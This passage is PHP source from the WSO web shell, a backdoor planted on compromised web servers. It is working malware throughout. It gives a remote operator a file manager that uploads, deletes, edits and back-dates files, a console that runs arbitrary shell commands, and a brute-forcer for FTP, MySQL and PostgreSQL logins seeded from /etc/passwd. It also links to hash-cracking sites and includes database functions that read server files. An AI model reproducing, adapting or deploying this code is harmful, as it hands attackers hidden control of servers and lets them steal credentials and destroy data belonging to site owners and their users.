				if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
					echo "Can't upload file!";
				break;
			case 'mkdir':
				if(!@mkdir($_POST['p2']))
					echo "Can't create new dir";
				break;
			case 'delete':
				function deleteDir($path) {
					$path = (substr($path,-1)=='/') ? $path:$path.'/';
					$dh  = opendir($path);
					while ( ($item = readdir($dh) ) !== false) {
						$item = $path.$item;
						if ( (basename($item) == "..") || (basename($item) == ".") )
							continue;
						$type = filetype($item);
						if ($type == "dir")
							deleteDir($item);
						else
							@unlink($item);
					}
					closedir($dh);
					@rmdir($path);
				}
				if(is_array(@$_POST['f']))
					foreach($_POST['f'] as $f) {
                        if($f == '..')
                            continue;
						$f = urldecode($f);
						if(is_dir($f))
							deleteDir($f);
						else
							@unlink($f);
					}
				break;
			case 'paste':
				if($_COOKIE['act'] == 'copy') {
					function copy_paste($c,$s,$d){
						if(is_dir($c.$s)){
							mkdir($d.$s);
							$h = @opendir($c.$s);
							while (($f = @readdir($h)) !== false)
								if (($f != ".") and ($f != ".."))
									copy_paste($c.$s.'/',$f, $d.$s.'/');
						} elseif(is_file($c.$s))
							@copy($c.$s, $d.$s);
					}
					foreach($_COOKIE['f'] as $f)
						copy_paste($_COOKIE['c'],$f, $GLOBALS['cwd']);
				} elseif($_COOKIE['act'] == 'move') {
					function move_paste($c,$s,$d){
						if(is_dir($c.$s)){
							mkdir($d.$s);
							$h = @opendir($c.$s);
							while (($f = @readdir($h)) !== false)
								if (($f != ".") and ($f != ".."))
									copy_paste($c.$s.'/',$f, $d.$s.'/');
						} elseif(@is_file($c.$s))
							@copy($c.$s, $d.$s);
					}
					foreach($_COOKIE['f'] as $f)
						@rename($_COOKIE['c'].$f, $GLOBALS['cwd'].$f);
				} elseif($_COOKIE['act'] == 'zip') {
					if(class_exists('ZipArchive')) {
                        $zip = new ZipArchive();
                        if ($zip->open($_POST['p2'], 1)) {
                            chdir($_COOKIE['c']);
                            foreach($_COOKIE['f'] as $f) {
                                if($f == '..')
                                    continue;
                                if(@is_file($_COOKIE['c'].$f))
                                    $zip->addFile($_COOKIE['c'].$f, $f);
                                elseif(@is_dir($_COOKIE['c'].$f)) {
                                    $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/'));
                                    foreach ($iterator as $key=>$value) {
                                        $zip->addFile(realpath($key), $key);
                                    }
                                }
                            }
                            chdir($GLOBALS['cwd']);
                            $zip->close();
                        }
                    }
				} elseif($_COOKIE['act'] == 'unzip') {
					if(class_exists('ZipArchive')) {
                        $zip = new ZipArchive();
                        foreach($_COOKIE['f'] as $f) {
                            if($zip->open($_COOKIE['c'].$f)) {
                                $zip->extractTo($GLOBALS['cwd']);
                                $zip->close();
                            }
                        }
                    }
				} elseif($_COOKIE['act'] == 'tar') {
                    chdir($_COOKIE['c']);
                    $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']);
                    wsoEx('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f']));
                    chdir($GLOBALS['cwd']);
				}
				unset($_COOKIE['f']);
                setcookie('f', '', time() - 3600);
				break;
			default:
                if(!empty($_POST['p1'])) {
					WSOsetcookie('act', $_POST['p1']);
					WSOsetcookie('f', serialize(@$_POST['f']));
					WSOsetcookie('c', @$_POST['c']);
				}
				break;
		}
	}
    wsoHeader();
	echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>';
	$dirContent = wsoScandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
	if($dirContent === false) {	echo 'Can\'t open this folder!';wsoFooter(); return; }
	global $sort;
	$sort = array('name', 1);
	if(!empty($_POST['p1'])) {
		if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
			$sort = array($match[1], (int)$match[2]);
	}
echo "<script>
	function sa() {
		for(i=0;i<d.files.elements.length;i++)
			if(d.files.elements[i].type == 'checkbox')
				d.files.elements[i].checked = d.files.elements[0].checked;
	}
</script>
<table width='100%' class='main' cellspacing='0' cellpadding='2'>
<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
	$dirs = $files = array();
	$n = count($dirContent);
	for($i=0;$i<$n;$i++) {
		$ow = @posix_getpwuid(@fileowner($dirContent[$i]));
		$gr = @posix_getgrgid(@filegroup($dirContent[$i]));
		$tmp = array('name' => $dirContent[$i],
					 'path' => $GLOBALS['cwd'].$dirContent[$i],
					 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])),
					 'perms' => wsoPermsColor($GLOBALS['cwd'] . $dirContent[$i]),
					 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
					 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
					 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
					);
		if(@is_file($GLOBALS['cwd'] . $dirContent[$i]))
			$files[] = array_merge($tmp, array('type' => 'file'));
		elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i]))
			$dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
		elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])&& ($dirContent[$i] != "."))
			$dirs[] = array_merge($tmp, array('type' => 'dir'));
	}
	$GLOBALS['sort'] = $sort;
	function wsoCmp($a, $b) {
		if($GLOBALS['sort'][0] != 'size')
			return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
		else
			return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
	}
	usort($files, "wsoCmp");
	usort($dirs, "wsoCmp");
	$files = array_merge($dirs, $files);
	$l = 0;
	foreach($files as $f) {
		echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" ' . (empty ($f['link']) ? '' : "title='{$f['link']}'") . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>').'</a></td><td>'.(($f['type']=='file')?wsoViewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
			.'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
		$l = $l?0:1;
	}
	echo "<tr><td colspan=7>
	<input type=hidden name=a value='FilesMan'>
	<input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'>
	<input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'>
	<select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>";
    if(class_exists('ZipArchive'))
        echo "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>";
    echo "<option value='tar'>Compress (tar.gz)</option>";
    if(!empty($_COOKIE['act']) && @count($_COOKIE['f']))
        echo "<option value='paste'>Paste / Compress</option>";
    echo "</select>&nbsp;";
    if(!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar')))
        echo "file name: <input type=text name=p2 value='wso_" . date("Ymd_His") . "." . ($_COOKIE['act'] == 'zip'?'zip':'tar.gz') . "'>&nbsp;";
    echo "<input type='submit' value='>>'></td></tr></form></table></div>";
	wsoFooter();
}

function actionStringTools() {
	if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
    if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}}
	if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
	if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= sprintf('%02X',ord($p[$i]));return strtoupper($r);}}
	if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
	$stringTools = array(
		'Base64 encode' => 'base64_encode',
		'Base64 decode' => 'base64_decode',
		'Url encode' => 'urlencode',
		'Url decode' => 'urldecode',
		'Full urlencode' => 'full_urlencode',
		'md5 hash' => 'md5',
		'sha1 hash' => 'sha1',
		'crypt' => 'crypt',
		'CRC32' => 'crc32',
		'ASCII to HEX' => 'ascii2hex',
		'HEX to ASCII' => 'hex2ascii',
		'HEX to DEC' => 'hexdec',
		'HEX to BIN' => 'hex2bin',
		'DEC to HEX' => 'dechex',
		'DEC to BIN' => 'decbin',
		'BIN to HEX' => 'binhex',
		'BIN to DEC' => 'bindec',
		'String to lower case' => 'strtolower',
		'String to upper case' => 'strtoupper',
		'Htmlspecialchars' => 'htmlspecialchars',
		'String length' => 'strlen',
	);
	if(isset($_POST['ajax'])) {
		WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', true);
		ob_start();
		if(in_array($_POST['p1'], $stringTools))
			echo $_POST['p1']($_POST['p2']);
		$temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
		echo strlen($temp), "\n", $temp;
		exit;
	}
    if(empty($_POST['ajax'])&&!empty($_POST['p1']))
		WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', 0);
	wsoHeader();
	echo '<h1>String conversions</h1><div class=content>';
	echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
	foreach($stringTools as $k => $v)
		echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
		echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
	if(!empty($_POST['p1'])) {
		if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
	}
	echo"</pre></div><br><h1>Search files:</h1><div class=content>
		<form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'>
			<tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>
			<tr><td>Path:</td><td><input type='text' name='cwd' value='". htmlspecialchars($GLOBALS['cwd']) ."' style='width:100%'></td></tr>
			<tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>
			<tr><td></td><td><input type='submit' value='>>'></td></tr>
			</table></form>";

	function wsoRecursiveGlob($path) {
		if(substr($path, -1) != '/')
			$path.='/';
		$paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR)));
		if(is_array($paths)&&@count($paths)) {
			foreach($paths as $item) {
				if(@is_dir($item)){
					if($path!=$item)
						wsoRecursiveGlob($item);
				} else {
					if(empty($_POST['p2']) || @strpos(file_get_contents($item), $_POST['p2'])!==false)
						echo "<a href='#' onclick='g(\"FilesTools\",null,\"".urlencode($item)."\", \"view\",\"\")'>".htmlspecialchars($item)."</a><br>";
				}
			}
		}
	}
	if(@$_POST['p3'])
		wsoRecursiveGlob($_POST['c']);
	echo "</div><br><h1>Search for hash:</h1><div class=content>
		<form method='post' target='_blank' name='hf'>
			<input type='text' name='hash' style='width:200px;'><br>
            <input type='hidden' name='act' value='find'/>
			<input type='button' value='hashcracking.ru' onclick=\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\"><br>
			<input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>
            <input type='button' value='crackfor.me' onclick=\"document.hf.action='http://crackfor.me/index.php';document.hf.submit()\"><br>
		</form></div>";
	wsoFooter();
}

function actionFilesTools() {
	if( isset($_POST['p1']) )
		$_POST['p1'] = urldecode($_POST['p1']);
	if(@$_POST['p2']=='download') {
		if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
			ob_start("ob_gzhandler", 4096);
			header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
			if (function_exists("mime_content_type")) {
				$type = @mime_content_type($_POST['p1']);
				header("Content-Type: " . $type);
			} else
                header("Content-Type: application/octet-stream");
			$fp = @fopen($_POST['p1'], "r");
			if($fp) {
				while(!@feof($fp))
					echo @fread($fp, 1024);
				fclose($fp);
			}
		}exit;
	}
	if( @$_POST['p2'] == 'mkfile' ) {
		if(!file_exists($_POST['p1'])) {
			$fp = @fopen($_POST['p1'], 'w');
			if($fp) {
				$_POST['p2'] = "edit";
				fclose($fp);
			}
		}
	}
	wsoHeader();
	echo '<h1>File tools</h1><div class=content>';
	if( !file_exists(@$_POST['p1']) ) {
		echo 'File not exists';
		wsoFooter();
		return;
	}
	$uid = @posix_getpwuid(@fileowner($_POST['p1']));
	if(!$uid) {
		$uid['name'] = @fileowner($_POST['p1']);
		$gid['name'] = @filegroup($_POST['p1']);
	} else $gid = @posix_getgrgid(@filegroup($_POST['p1']));
	echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?wsoViewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.wsoPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
	echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
	if( empty($_POST['p2']) )
		$_POST['p2'] = 'view';
	if( is_file($_POST['p1']) )
		$m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
	else
		$m = array('Chmod', 'Rename', 'Touch');
	foreach($m as $v)
		echo '<a href=# onclick="g(null,null,\'' . urlencode($_POST['p1']) . '\',\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
	echo '<br><br>';
	switch($_POST['p2']) {
		case 'view':
			echo '<pre class=ml1>';
			$fp = @fopen($_POST['p1'], 'r');
			if($fp) {
				while( !@feof($fp) )
					echo htmlspecialchars(@fread($fp, 1024));
				@fclose($fp);
			}
			echo '</pre>';
			break;
		case 'highlight':
			if( @is_readable($_POST['p1']) ) {
				echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
				$code = @highlight_file($_POST['p1'],true);
				echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
			}
			break;
		case 'chmod':
			if( !empty($_POST['p3']) ) {
				$perms = 0;
				for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
					$perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
				if(!@chmod($_POST['p1'], $perms))
					echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
			}
			clearstatcache();
			echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
			break;
		case 'edit':
			if( !is_writable($_POST['p1'])) {
				echo 'File isn\'t writeable';
				break;
			}
			if( !empty($_POST['p3']) ) {
				$time = @filemtime($_POST['p1']);
				$_POST['p3'] = substr($_POST['p3'],1);
				$fp = @fopen($_POST['p1'],"w");
				if($fp) {
					@fwrite($fp,$_POST['p3']);
					@fclose($fp);
					echo 'Saved!<br><script>p3_="";</script>';
					@touch($_POST['p1'],$time,$time);
				}
			}
			echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>';
			$fp = @fopen($_POST['p1'], 'r');
			if($fp) {
				while( !@feof($fp) )
					echo htmlspecialchars(@fread($fp, 1024));
				@fclose($fp);
			}
			echo '</textarea><input type=submit value=">>"></form>';
			break;
		case 'hexdump':
			$c = @file_get_contents($_POST['p1']);
			$n = 0;
			$h = array('00000000<br>','','');
			$len = strlen($c);
			for ($i=0; $i<$len; ++$i) {
				$h[1] .= sprintf('%02X',ord($c[$i])).' ';
				switch ( ord($c[$i]) ) {
					case 0:  $h[2] .= ' '; break;
					case 9:  $h[2] .= ' '; break;
					case 10: $h[2] .= ' '; break;
					case 13: $h[2] .= ' '; break;
					default: $h[2] .= $c[$i]; break;
				}
				$n++;
				if ($n == 32) {
					$n = 0;
					if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
					$h[1] .= '<br>';
					$h[2] .= "\n";
				}
		 	}
			echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
			break;
		case 'rename':
			if( !empty($_POST['p3']) ) {
				if(!@rename($_POST['p1'], $_POST['p3']))
					echo 'Can\'t rename!<br>';
				else
					die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
			}
			echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
			break;
		case 'touch':
			if( !empty($_POST['p3']) ) {
				$time = strtotime($_POST['p3']);
				if($time) {
					if(!touch($_POST['p1'],$time,$time))
						echo 'Fail!';
					else
						echo 'Touched!';
				} else echo 'Bad time format!';
			}
			clearstatcache();
			echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
			break;
	}
	echo '</div>';
	wsoFooter();
}

function actionConsole() {
    if(!empty($_POST['p1']) && !empty($_POST['p2'])) {
        WSOsetcookie(md5($_SERVER['HTTP_HOST']).'stderr_to_out', true);
        $_POST['p1'] .= ' 2>&1';
    } elseif(!empty($_POST['p1']))
        WSOsetcookie(md5($_SERVER['HTTP_HOST']).'stderr_to_out', 0);

	if(isset($_POST['ajax'])) {
		WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', true);
		ob_start();
		echo "d.cf.cmd.value='';\n";
		$temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".wsoEx($_POST['p1']),"\n\r\t\\'\0"));
		if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match))	{
			if(@chdir($match[1])) {
				$GLOBALS['cwd'] = @getcwd();
				echo "c_='".$GLOBALS['cwd']."';";
			}
		}
		echo "d.cf.output.value+='".$temp."';";
		echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";
		$temp = ob_get_clean();
		echo strlen($temp), "\n", $temp;
		exit;
	}
    if(empty($_POST['ajax'])&&!empty($_POST['p1']))
		WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', 0);
	wsoHeader();
    echo "<script>
if(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds = new Array('');
var cur = 0;
function kp(e) {
	var n = (window.Event) ? e.which : e.keyCode;
	if(n == 38) {
		cur--;
		if(cur>=0)
			document.cf.cmd.value = cmds[cur];
		else
			cur++;
	} else if(n == 40) {
		cur++;
		if(cur < cmds.length)
			document.cf.cmd.value = cmds[cur];
		else
			cur--;
	}
}
function add(cmd) {
	cmds.pop();
	cmds.push(cmd);
	cmds.push('');
	cur = cmds.length-1;
}
</script>";
	echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>';
	foreach($GLOBALS['aliases'] as $n => $v) {
		if($v == '') {
			echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
			continue;
		}
		echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
	}
	
	echo '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 '.(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2'])||$_COOKIE[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
	if(!empty($_POST['p1'])) {
		echo htmlspecialchars("$ ".$_POST['p1']."\n".wsoEx($_POST['p1']));
	}
	echo '</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>';
	echo '</form></div><script>d.cf.cmd.focus();</script>';
	wsoFooter();
}

function actionLogout() {
    setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600);
	die('bye!');
}

function actionSelfRemove() {

	if($_POST['p1'] == 'yes')
		if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
			die('Shell has been removed');
		else
			echo 'unlink error!';
    if($_POST['p1'] != 'yes')
        wsoHeader();
	echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
	wsoFooter();
}

function actionBruteforce() {
	wsoHeader();
	if( isset($_POST['proto']) ) {
		echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
		if( $_POST['proto'] == 'ftp' ) {
			function wsoBruteForce($ip,$port,$login,$pass) {
				$fp = @ftp_connect($ip, $port?$port:21);
				if(!$fp) return false;
				$res = @ftp_login($fp, $login, $pass);
				@ftp_close($fp);
				return $res;
			}
		} elseif( $_POST['proto'] == 'mysql' ) {
			function wsoBruteForce($ip,$port,$login,$pass) {
				$res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
				@mysql_close($res);
				return $res;
			}
		} elseif( $_POST['proto'] == 'pgsql' ) {
			function wsoBruteForce($ip,$port,$login,$pass) {
				$str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres";
				$res = @pg_connect($str);
				@pg_close($res);
				return $res;
			}
		}
		$success = 0;
		$attempts = 0;
		$server = explode(":", $_POST['server']);
		if($_POST['type'] == 1) {
			$temp = @file('/etc/passwd');
			if( is_array($temp) )
				foreach($temp as $line) {
					$line = explode(":", $line);
					++$attempts;
					if( wsoBruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
						$success++;
						echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
					}
					if(@$_POST['reverse']) {
						$tmp = "";
						for($i=strlen($line[0])-1; $i>=0; --$i)
							$tmp .= $line[0][$i];
						++$attempts;
						if( wsoBruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
							$success++;
							echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
						}
					}
				}
		} elseif($_POST['type'] == 2) {
			$temp = @file($_POST['dict']);
			if( is_array($temp) )
				foreach($temp as $line) {
					$line = trim($line);
					++$attempts;
					if( wsoBruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
						$success++;
						echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
					}
				}
		}
		echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
	}
	echo '<h1>Bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
		.'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'
		.'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
		.'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
		.'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
		.'<span>Server:port</span></td>'
		.'<td><input type=text name=server value="127.0.0.1"></td></tr>'
		.'<tr><td><span>Brute type</span></td>'
		.'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'
		.'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'
		.'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'
		.'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
		.'<td><input type=text name=login value="root"></td></tr>'
		.'<tr><td><span>Dictionary</span></td>'
		.'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
		.'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
	echo '</div><br>';
	wsoFooter();
}

function actionSql() {
	class DbClass {
		var $type;
		var $link;
		var $res;
		function DbClass($type)	{
			$this->type = $type;
		}
		function connect($host, $user, $pass, $dbname){
			switch($this->type)	{
				case 'mysql':
					if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
					break;
				case 'pgsql':
					$host = explode(':', $host);
					if(!$host[1]) $host[1]=5432;
					if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
					break;
			}
			return false;
		}
		function selectdb($db) {
			switch($this->type)	{
				case 'mysql':
					if (@mysql_select_db($db))return true;
					break;
			}
			return false;
		}
		function query($str) {
			switch($this->type) {
				case 'mysql':
					return $this->res = @mysql_query($str);
					break;
				case 'pgsql':
					return $this->res = @pg_query($this->link,$str);
					break;
			}
			return false;
		}
		function fetch() {
			$res = func_num_args()?func_get_arg(0):$this->res;
			switch($this->type)	{
				case 'mysql':
					return @mysql_fetch_assoc($res);
					break;
				case 'pgsql':
					return @pg_fetch_assoc($res);
					break;
			}
			return false;
		}
		function listDbs() {
			switch($this->type)	{
				case 'mysql':
                        return $this->query("SHOW databases");
				break;
				case 'pgsql':
					return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
				break;
			}
			return false;
		}
		function listTables() {
			switch($this->type)	{
				case 'mysql':
					return $this->res = $this->query('SHOW TABLES');
				break;
				case 'pgsql':
					return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
				break;
			}
			return false;
		}
		function error() {
			switch($this->type)	{
				case 'mysql':
					return @mysql_error();
				break;
				case 'pgsql':
					return @pg_last_error();
				break;
			}
			return false;
		}
		function setCharset($str) {
			switch($this->type)	{
				case 'mysql':
					if(function_exists('mysql_set_charset'))
						return @mysql_set_charset($str, $this->link);
					else
						$this->query('SET CHARSET '.$str);
					break;
				case 'pgsql':
					return @pg_set_client_encoding($this->link, $str);
					break;
			}
			return false;
		}
		function loadFile($str) {
			switch($this->type)	{
				case 'mysql':
					return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
				break;
				case 'pgsql':
					$this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '".addslashes($str)."';select file from wso2;");
					$r=array();
					while($i=$this->fetch())
						$r[] = $i['file'];
					$this->query('drop table wso2');
					return array('file'=>implode("\n",$r));
				break;
			}
			return false;
		}
		function dump($table, $fp = false) {
			switch($this->type)	{
				case 'mysql':
					$res = $this->query('SHOW CREATE TABLE `'.$table.'`');
					$create = mysql_fetch_array($res);
					$sql = $create[1].";\n";
                    if($fp) fwrite($fp, $sql); else echo($sql);
					$this->query('SELECT * FROM `'.$table.'`');
                    $i = 0;
                    $head = true;
					while($item = $this->fetch()) {
                        $sql = '';
                        if($i % 1000 == 0) {
                            $head = true;
                            $sql = ";\n\n";
                        }

						$columns = array();
